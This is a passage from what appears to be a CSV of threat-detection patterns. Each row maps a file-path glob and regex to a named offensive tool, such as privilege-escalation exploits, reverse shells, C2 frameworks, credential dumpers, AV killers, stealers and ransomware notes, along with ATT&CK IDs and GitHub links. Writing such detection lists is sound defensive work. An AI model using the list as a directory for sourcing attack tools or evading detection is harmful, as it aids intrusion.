- T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","18006" "*\RemotePotato0.zip*",".{0,1000}\\RemotePotato0\.zip.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","18007" "*\RemotePotato0-main.zip*",".{0,1000}\\RemotePotato0\-main\.zip.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain 
Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","18008" "*\RemotePotato0-main\*",".{0,1000}\\RemotePotato0\-main\\.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","18009" "*\remoteshell.py*",".{0,1000}\\remoteshell\.py.{0,1000}","offensive_tool_keyword","impacketremoteshell","install a legit application and interface with it over smb w/o the signature of cmd.exe / powershell.exe being called or the redirection typically used by those techniques","T1077 - T1059.007 - T1569.001","TA0008 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","18010" "*\remove_allowlongscriptruntime.py*",".{0,1000}\\remove_allowlongscriptruntime\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","18016" "*\remove_allowlongscriptruntime.txt*",".{0,1000}\\remove_allowlongscriptruntime\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 
- TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","18017" "*\Remove_defender_moduled\*",".{0,1000}\\Remove_defender_moduled\\.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","18018" "*\RemoveItemCommand.cs",".{0,1000}\\RemoveItemCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","18019" "*\rentdrv.log*",".{0,1000}\\rentdrv\.log.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001 - T1211 - T1055.001","TA0005 - TA0002","N/A","Black Basta","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","0","N/A","N/A","9","3","270","38","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z","18020" "*\request_shellcode.exe*",".{0,1000}\\request_shellcode\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","18021" "*\ResolveDnsNameCommand.cs",".{0,1000}\\ResolveDnsNameCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","18024" "*\Resources\Disks-NoEncryption.txt*",".{0,1000}\\Resources\\Disks\-NoEncryption\.txt.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","0","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","18025" "*\Resources\mimikatz.exe*",".{0,1000}\\Resources\\mimikatz\.exe.{0,1000}","offensive_tool_keyword","DeadPotato","DeadPotato is a windows privilege escalation utility from the Potato family of exploits leveraging the SeImpersonate right to obtain SYSTEM privileges","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/lypd0/DeadPotato","1","0","N/A","N/A","10","4","382","45","2024-08-17T06:08:29Z","2024-07-31T01:08:30Z","18026" "*\resources\PROCEXP.sys*",".{0,1000}\\resources\\PROCEXP\.sys.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1562.001 - T1569 - T1059","TA0005 - TA0040 - TA0002","N/A","Black Basta - LockBit","Defense Evasion","https://github.com/Yaxser/Backstab","1","0","N/A","N/A","10","10","1435","244","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z","18027" "*\Responder-Session.log*",".{0,1000}\\Responder\-Session\.log.{0,1000}","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","18028" "*\Restore Your Files.txt*",".{0,1000}\\Restore\sYour\sFiles\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","18035" "*\RESTORE_FILES.txt*",".{0,1000}\\RESTORE_FILES\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","18036" "*\RESTORE-FILES-Q7ILknn7k.txt*",".{0,1000}\\RESTORE\-FILES\-Q7ILknn7k\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","18037" "*\restoresig.py*",".{0,1000}\\restoresig\.py.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","N/A","10","5","401","70","2024-07-08T15:58:37Z","2024-04-09T16:33:27Z","18038" "*\revbshell-master*",".{0,1000}\\revbshell\-master.{0,1000}","offensive_tool_keyword","revbshell","ReVBShell - Reverse VBS Shell","T1059.005 - T1573.001 - T1105","TA0011 - 
TA0010","N/A","N/A","C2","https://github.com/bitsadmin/revbshell","1","0","N/A","N/A","10","10","81","27","2019-10-08T12:00:05Z","2017-02-19T18:58:52Z","18039" "*\Revenge-RAT v*.exe*",".{0,1000}\\Revenge\-RAT\sv.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","18040" "*\reverse.exe*",".{0,1000}\\reverse\.exe.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","18041" "*\reverse64.bin*",".{0,1000}\\reverse64\.bin.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","18042" "*\ReverseProxy.dll*",".{0,1000}\\ReverseProxy\.dll.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. 
Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","18043" "*\ReverseShell.ahk*",".{0,1000}\\ReverseShell\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","18044" "*\reverse-shellcode.cpp*",".{0,1000}\\reverse\-shellcode\.cpp.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","18045" "*\reverse-ssh\*",".{0,1000}\\reverse\-ssh\\.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","18046" "*\revil1.txt*",".{0,1000}\\revil1\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom 
notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","18047" "*\revil2.txt*",".{0,1000}\\revil2\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","18048" "*\revil3.txt*",".{0,1000}\\revil3\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","18049" "*\RevlCmd.dll*",".{0,1000}\\RevlCmd\.dll.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","18050" "*\revshell.ps1*",".{0,1000}\\revshell\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","18052" "*\revshell.ps1*",".{0,1000}\\revshell\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 
- T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","18053" "*\revshell.py*",".{0,1000}\\revshell\.py.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","N/A","N/A","3","10","29","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z","18054" "*\revshell32.bin*",".{0,1000}\\revshell32\.bin.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","18055" "*\revshell64.bin*",".{0,1000}\\revshell64\.bin.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","18056" "*\revsocks.exe*",".{0,1000}\\revsocks\.exe.{0,1000}","offensive_tool_keyword","revsocks","Cross-platform SOCKS5 proxy server program/library written in C that can also reverse itself over a firewall.","T1572 - T1090 - T1071","TA0001 - TA0010 - 
TA0011","N/A","Dispossessor","C2","https://github.com/emilarner/revsocks","1","0","N/A","https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms","10","10","31","4","2022-08-08T07:59:16Z","2022-03-29T22:12:18Z","18057" "*\revsocks.exe*",".{0,1000}\\revsocks\.exe.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","0","N/A","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","18058" "*\revsocks\*.go*",".{0,1000}\\revsocks\\.{0,1000}\.go.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","0","N/A","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","18059" "*\revsocks\make.bat*",".{0,1000}\\revsocks\\make\.bat.{0,1000}","offensive_tool_keyword","revsocks","Cross-platform SOCKS5 proxy server program/library written in C that can also reverse itself over a firewall.","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/emilarner/revsocks","1","0","N/A","https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms","10","10","31","4","2022-08-08T07:59:16Z","2022-03-29T22:12:18Z","18060" "*\revsocks-master\*",".{0,1000}\\revsocks\-master\\.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","0","N/A","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","18061" "*\RFNCW-DECRYPT.txt*",".{0,1000}\\RFNCW\-DECRYPT\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes 
archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","18062" "*\rfs_injection.exe*",".{0,1000}\\rfs_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","18063" "*\rid_hijack.py*",".{0,1000}\\rid_hijack\.py.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","N/A","N/A","9","2","174","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z","18065" "*\rid_hijack.py*",".{0,1000}\\rid_hijack\.py.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","18066" "*\rid_hijack.rb*",".{0,1000}\\rid_hijack\.rb.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","N/A","N/A","9","2","174","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z","18067" 
"*\RID-Hijacking\*",".{0,1000}\\RID\-Hijacking\\.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","N/A","N/A","9","2","174","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z","18068" "*\RID-Hijacking-master*",".{0,1000}\\RID\-Hijacking\-master.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","N/A","N/A","9","2","174","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z","18069" "*\Risen_Guide.hta*",".{0,1000}\\Risen_Guide\.hta.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","18070" "*\Risen_Guide2.hta*",".{0,1000}\\Risen_Guide2\.hta.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","18071" "*\Risen_Note.txt*",".{0,1000}\\Risen_Note\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","18072" "*\rm_injection.exe*",".{0,1000}\\rm_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - 
T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","18073" "*\ROADToken.csproj*",".{0,1000}\\ROADToken\.csproj.{0,1000}","offensive_tool_keyword","ROADtoken","Abusing Azure AD SSO with the Primary Refresh Token - ROADtoken is a tool that uses the BrowserCore.exe binary to obtain a cookie that can be used with SSO and Azure AD","T1557 - T1078 - T1071.001 - T1552.001","TA0006 ","N/A","N/A","Credential Access","https://github.com/dirkjanm/ROADtoken","1","0","N/A","N/A","7","1","89","17","2020-09-30T16:18:47Z","2020-07-21T12:42:14Z","18078" "*\ROADToken.exe*",".{0,1000}\\ROADToken\.exe.{0,1000}","offensive_tool_keyword","ROADtoken","Abusing Azure AD SSO with the Primary Refresh Token - ROADtoken is a tool that uses the BrowserCore.exe binary to obtain a cookie that can be used with SSO and Azure AD","T1557 - T1078 - T1071.001 - T1552.001","TA0006 ","N/A","N/A","Credential Access","https://github.com/dirkjanm/ROADtoken","1","0","N/A","N/A","7","1","89","17","2020-09-30T16:18:47Z","2020-07-21T12:42:14Z","18079" "*\ROADToken.sln*",".{0,1000}\\ROADToken\.sln.{0,1000}","offensive_tool_keyword","ROADtoken","Abusing Azure AD SSO with the Primary Refresh Token - ROADtoken is a tool that uses the BrowserCore.exe binary to obtain a cookie that can be used with SSO and Azure AD","T1557 - T1078 - T1071.001 - T1552.001","TA0006 ","N/A","N/A","Credential Access","https://github.com/dirkjanm/ROADtoken","1","0","N/A","N/A","7","1","89","17","2020-09-30T16:18:47Z","2020-07-21T12:42:14Z","18080" "*\ROADtoken\bin\*",".{0,1000}\\ROADtoken\\bin\\.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - 
T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","N/A","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","18081" "*\ROADtools\*",".{0,1000}\\ROADtools\\.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","APT29 - COZY BEAR - Black Basta","Exploitation tool","https://github.com/dirkjanm/ROADtools","1","0","N/A","network exploitation tool","10","10","2126","295","2025-04-17T18:55:20Z","2020-03-28T09:56:08Z","18082" "*\roaster.py*",".{0,1000}\\roaster\.py.{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/Tw1sm/RITM","1","0","N/A","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","18083" "*\Roblox Cookies.txt*",".{0,1000}\\Roblox\sCookies\.txt.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","N/A","10","","N/A","","","","18084" "*\roblox 
cookies.txt*",".{0,1000}\\roblox\scookies\.txt.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","N/A","N/A","10","","N/A","","","","18085" "*\roboform\app\getCredsroboformapp.h*",".{0,1000}\\roboform\\app\\getCredsroboformapp\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","18086" "*\roboform\app\getCredsroboformapp2.h*",".{0,1000}\\roboform\\app\\getCredsroboformapp2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","18087" "*\roboform\app\getCredsroboformapp3.h*",".{0,1000}\\roboform\\app\\getCredsroboformapp3\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","18088" "*\roboform\plugin\getCredsroboformplugin.h*",".{0,1000}\\roboform\\plugin\\getCredsroboformplugin\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential 
